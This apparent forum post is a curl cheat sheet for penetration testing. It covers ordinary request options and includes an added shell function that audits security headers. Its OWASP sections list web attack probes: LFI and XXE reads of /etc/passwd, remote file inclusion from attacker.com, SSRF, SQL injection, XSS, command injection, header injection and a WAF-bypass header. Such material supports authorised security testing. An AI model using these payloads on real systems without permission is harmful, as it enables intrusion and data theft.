lazyhacker 1 year ago

Curl Command Cheat Sheet for Penetration Testing

Curl is a command-line tool for making HTTP requests. It is widely used for testing APIs, downloading files, and performing various web-related tasks. Below is a cheat sheet to help you use curl effectively:

**Curl Command Cheat Sheet:**

# Simple GET request:
curl <URL>

# Save output to a file:
curl -o <filename> <URL>

# Follow redirects:
curl -L <URL>

# Custom HTTP method:
curl -X <METHOD> <URL>

# Include headers:
curl -H "Header-Name: Header-Value" <URL>

# Include multiple headers:
curl -H "Header1: Value1" -H "Header2: Value2" <URL>

# Set request data with POST method:
curl -X POST -d "key1=value1&key2=value2" <URL>

# Send JSON data:
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL>

# Send data from a file:
curl -X POST -d @<filename> <URL>

# Basic authentication:
curl -u username:password <URL>

# Include a user agent:
curl -A "User-Agent-String" <URL>

# Show request and response headers:
curl -v <URL>

# Show only response headers:
curl -I <URL>

# Set request timeout:
curl --max-time <seconds> <URL>

# Ignore SSL certificate validation:
curl -k <URL>

# Download multiple files in one command (transfers run one after another; add -Z / --parallel to run them concurrently):
curl -O <URL1> -O <URL2>

# Display progress during download:
curl -# -O <URL>

# Download a file with a custom name:
curl -o <custom-name> <URL>

# Upload a file with PUT method:
curl -X PUT -T <file> <URL>

# Set custom user agent:
curl -H "User-Agent: Custom-UA" <URL>

HTTP methods (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)

# GET Request
curl -X GET https://api.example.com/data

# POST Request
curl -X POST -d "param1=value1&param2=value2" https://api.example.com/data

# PUT Request
curl -X PUT -d "param1=value1&param2=value2" https://api.example.com/data

# DELETE Request
curl -X DELETE https://api.example.com/data

# PATCH Request
curl -X PATCH -d "param1=new_value1" https://api.example.com/data

# HEAD Request (use -I; -X HEAD only changes the method name and curl then waits for a body that never arrives)
curl -I https://api.example.com/data

# OPTIONS Request
curl -X OPTIONS https://api.example.com/data

Checking HTTP Security Headers

# Checking HTTP Strict Transport Security (HSTS) header
curl -I https://example.com

# Checking Content Security Policy (CSP) header
curl -I https://example.com

# Checking X-Content-Type-Options header
curl -I https://example.com

# Checking X-Frame-Options header
curl -I https://example.com

# Checking X-XSS-Protection header
curl -I https://example.com

# Checking Referrer-Policy header
curl -I https://example.com

# Checking Feature-Policy header
curl -I https://example.com

# Checking Cross-Origin-Resource-Policy (CORP) header
curl -I https://example.com

# Checking Cross-Origin-Embedder-Policy (COEP) header
curl -I https://example.com

# Checking Cross-Origin-Opener-Policy (COOP) header
curl -I https://example.com

# Checking Expect-CT header
curl -I https://example.com

# Checking Public Key Pinning Extension for HTTP (HPKP) header
curl -I https://example.com
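
An added example (not part of the original cheat sheet): every check above runs the same `curl -I`, so this shell function reads one header dump and reports each listed header as PRESENT, WEAK or MISSING. The function names and the sample response are constructed for illustration, and the WEAK rules cover only `nosniff` and an HSTS `max-age` of 0.

```shell
#!/usr/bin/env bash
# Added example: audit one response for the security headers listed above.
# Live use: curl -sIL https://example.com | audit_headers
# X-XSS-Protection, Expect-CT and HPKP are deprecated, and Feature-Policy was
# replaced by Permissions-Policy, so MISSING is not a finding for those.
SEC_HEADERS="strict-transport-security content-security-policy \
x-content-type-options x-frame-options x-xss-protection referrer-policy \
feature-policy cross-origin-resource-policy cross-origin-embedder-policy \
cross-origin-opener-policy expect-ct public-key-pins"

# Reads raw response headers on stdin; prints one verdict line per header.
audit_headers() {
  awk -v wanted="$SEC_HEADERS" '
    BEGIN { n = split(wanted, names, " ") }
    { sub(/\r$/, "") }                        # curl output uses CRLF
    /^HTTP\// { split("", seen); next }       # new hop in a redirect chain: reset
    {
      i = index($0, ":"); if (i == 0) next
      v = substr($0, i + 1); gsub(/^[ \t]+|[ \t]+$/, "", v)
      seen[tolower(substr($0, 1, i - 1))] = v # header names are case-insensitive
    }
    END {
      for (k = 1; k <= n; k++) {
        h = names[k]
        if (!(h in seen)) { print "MISSING " h; continue }
        lv = tolower(seen[h]); state = "PRESENT"
        if (h == "x-content-type-options" && lv != "nosniff") state = "WEAK"
        # max-age=0 tells the browser to drop the HSTS policy
        if (h == "strict-transport-security" &&
            (!match(lv, /max-age=[0-9]+/) ||
             substr(lv, RSTART + 8, RLENGTH - 8) + 0 == 0)) state = "WEAK"
        print state " " h ": " seen[h]
      }
    }'
}

# Constructed sample: a 301 hop followed by the final 200 response.
sample_headers() {
  printf '%s\r\n' \
    'HTTP/1.1 301 Moved Permanently' 'Location: https://example.test/' \
    'X-Frame-Options: DENY' '' \
    'HTTP/2 200' 'Strict-Transport-Security: max-age=0' \
    'x-content-type-options: nosniff' \
    "Content-Security-Policy: default-src 'self'" ''
}

sample_headers | audit_headers
```

Only the final response in a redirect chain is judged, which is why the `X-Frame-Options` sent on the 301 hop is reported as MISSING.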

Curl Command Cheat Sheet for OWASP Top 10

# GET Request with Cookies and User-Agent:
curl -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" -H "Cookie: name=value; name2=value2" <URL>

# POST Request with Custom Headers and Data:
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: Bearer <TOKEN>" -d "username=user&password=pass" <URL>

# Sending Data as JSON and Receiving Pretty JSON Output:
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' <URL> | jq .

# Follow Redirects and Display Response Headers:
curl -iL <URL>

# Send Request with Basic Authentication:
curl -X GET -u username:password <URL>

# Testing for Local File Inclusion (LFI) Vulnerabilities:
curl -X GET <URL>/page.php?page=/etc/passwd

# Testing for Remote File Inclusion (RFI) Vulnerabilities:
curl -X GET <URL>/page.php?url=http://attacker.com/malicious-code.txt

# Checking for SSRF (Server-Side Request Forgery):
curl -X GET "http://vulnerable.com/api?url=http://internal-server/"

# Testing for SQL Injection (GET Request):
curl -X GET "<URL>?id=1' OR '1'='1"

# Testing for SQL Injection (POST Request):
curl -X POST -d "username=admin' OR '1'='1&password=test" <URL>

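# Testing for Cross-Site Scripting (XSS) Vulnerabilities (-G moves the data into the query string; -X GET with -d would send it as a request body):
curl -G --data-urlencode "input=<script>alert('XSS');</script>" <URL>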

# Testing for Server-Side Template Injection (SSTI):
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user={{7*7}}" <URL>

# Checking for Open Redirect Vulnerabilities:
curl -X GET <URL>?redirect=http://evil.com

# Testing for Command Injection (Basic Test):
curl -X GET "<URL>?input=test; whoami"

# Uploading a File with File Upload Functionality:
curl -X POST -F "file=@/path/to/local-file" <URL>

# Bypassing Web Application Firewalls (WAF):
curl -X GET -H "X-Forwarded-For: <malicious-IP>" <URL>

# Testing for Cross-Origin Resource Sharing (CORS) Misconfigurations (an Origin value includes the scheme):
curl -X GET -H "Origin: https://evil.com" <URL>

curl commands for text manipulation

# Writing Response to a File with No Progress Output:
curl -s -o <output-file> <URL>

# Displaying Response Headers Only:
curl -I <URL>

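# Displaying Only HTTP Response Code (-s hides the progress meter):
curl -s -o /dev/null -w "%{http_code}\n" <URL>

# Follow Redirects, but Limit Redirects to a Specified Number (--max-redirs; -m is the overall time limit in seconds):
curl -L -s --max-redirs <max-redirects> <URL>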

# Using a Specific Network Interface for the Request:
curl --interface <interface-name> <URL>

# Using a Specific DNS Server for Resolution:
curl --dns-servers <dns-server-ip> <URL>

# Making a Request with a Specific HTTP Version:
curl --http1.0 <URL>
curl --http2 <URL>

# Sending Data from a File with Raw Format:
curl -X POST --data-binary "@<file-path>" <URL>

# Using Custom HTTP Headers from a File:
curl -X GET -H "@<header-file>" <URL>

# Testing for XML External Entity (XXE) Vulnerabilities:
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' <URL>

# Testing for Server-Side Request Forgery (SSRF) with Time Delay:
curl -X GET "http://vulnerable.com/api?url=http://attacker.com/malicious-code.txt" -m 10

# Testing for HTTP Methods Misconfiguration (PUT, DELETE, etc.):
curl -X PUT -d "data=secret" <URL>

# Using a Specific User-Agent for the Request:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" <URL>

# Adding a Custom Host Header:
curl -H "Host: example.com" <URL>

# Using a Specific Proxy for the Request:
curl -x <proxy-url>:<port> <URL>

# Sending a Form with Multiple Fields:
curl -X POST -d "username=user&password=pass&other_field=value" <URL>

# Testing for HTTP Header Injection:
curl -X GET -H "Header: Malicious-Header%0d%0aInjection: value" <URL>